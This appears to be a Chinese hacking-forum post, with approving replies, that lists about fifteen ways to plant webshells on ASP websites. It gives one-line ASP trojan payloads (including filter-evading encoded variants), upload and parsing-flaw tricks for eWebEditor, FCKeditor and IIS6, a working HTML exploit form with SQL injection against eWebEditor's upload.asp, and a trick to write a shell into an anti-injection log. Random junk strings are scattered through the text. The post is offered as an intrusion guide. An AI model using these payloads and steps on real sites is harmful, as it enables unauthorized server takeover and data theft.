返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
* t1 {  x$ u+ q' z7 i* x0 O
7 e1 {7 ^! A5 m9 n# O6 ^2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
2 k0 Q; i# O1 C4 K( x! S" J
4 s% X7 R: ?; c0 l4 ~3.上传漏洞:* |+ ]% a  S& S  [% F$ ]5 J0 I7 f3 M

) r4 o- {: N1 M' O' v动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00" c$ |2 j4 d5 ^+ j% ~( F: F
, W9 @- U9 o3 M3 o
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
! l, a- X) s3 z
2 A$ h8 M; g6 u/ f# e雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
0 q' P; q& R6 u/ }0 s( r然后在上传文件里面填要传的图片格式的ASP木马0 i+ Z. `  I! J
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp# A: C  d9 F5 G5 ^+ q# T
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传3 y6 O+ Y5 |/ {& A5 ~; }% g" H

; o/ x' C3 n& n, y$ H. M  m<html>) Y/ v. a& U% `: @5 j
<head>
" u7 B. ]0 C/ o2 @5 {<title>ewebeditor upload.asp上传利用</title>- C" @% h& H- w  E: q( E8 g
</head>! s$ \' N7 C5 F) Q
<body>/ b" X0 p6 Z0 q+ }
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
. g3 @; F- j  X( {  k<input type=file name=uploadfile size=100><br><br>
0 p4 U  U3 @2 U: \( L! L<input type=submit value=Fuck>
2 g  A0 A" U/ I. T; l3 @7 B' T. E</form>+ Y* @% l9 _2 X6 A6 l" r# k$ Z
</body>
4 Y  S4 ?2 n8 I* d</form>2 a& Y& @% z( h# I! O
</html>
, r' }3 @$ u2 v9 j
2 l$ T4 W8 g: |* s4 i2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问* r3 \: s' X% U5 E( _1 F( O
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp' ~/ m- r) b+ c4 P4 e$ R( l4 a
' \, w$ @5 ^0 T- ?7 H; H8 z
利用windows2003解析。建立zjq.asp的文件夹0 q. U: l9 h! f! |1 C- ~8 b+ p/ |

) V9 }8 e% a+ d1 h$ U6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型* n5 t& b' ~6 Y  k* j, U/ ~" u* [6 i" m
# P+ Q) @& N( Q9 t% A8 x
7.cuteeditor:类似ewebeditor
( q8 N: r; @4 c3 p, V) ]2 s& ^" m1 [. @6 {
8.htmleditor:同上; D% N2 j' [* p! S4 H
" e5 _/ D! X% }. T' W* k* i: \+ y
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破8 `5 t9 h  _8 r" c  m( H$ f

' k  A# f% J. [3 V0 i3 B<%execute request("value")%><%'<% loop <%:%>; ?1 h, @! ]1 ^; ~* N! P
2 l% ~# Z) K. j% v5 ^* _- _8 Y
<%'<% loop <%:%><%execute request("value")%>
) j7 a8 L3 E/ D& c! a+ O0 }  I5 n* ~5 _4 ^# N2 d
<%execute request("value")'<% loop <%:%>
1 z% w2 w. c7 k9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞  l; c0 \  m3 o" O

7 Q3 _7 ?) f, W$ Y10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞4 I! b, W: l' d

* ?- o) o% S1 ?) X11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
8 ?  v; Q4 |# t3 \* d
& K7 |  v$ @/ p解析漏洞得到webshell- f% D9 C+ L$ p+ g5 k2 h, z
0 `4 L' `; T  I3 a, u
12.mssql差异备份,日志备份,前提需知道web路径8 i& v; ]  B- d  B& T

3 p4 [0 T1 \3 K13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
. n, ~- S* ]$ s! _& o/ Q9 z5 K
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
" J) x, ]6 t; H0 D: T) {- B# n- Z5 T/ `( l, w
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
8 w# e  |; w) `5 \  p# C$ {% Q8 g% D' }3 E6 U
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
- `* _; z$ f+ o9 f7 ^不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 - ]7 }- V7 i& |1 {

- ]* J5 S$ l2 G; F
5 f; N  d1 t/ [+ y4 J很好啊、基本的入侵方法都包含了. }4 m* b- K# ~# }! @- U

! h0 ~* F0 d$ z9 H最好来个提权的帖子再。. B* `" W% }+ r7 }+ I+ u9 ]
3 D% h: S7 m5 r
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表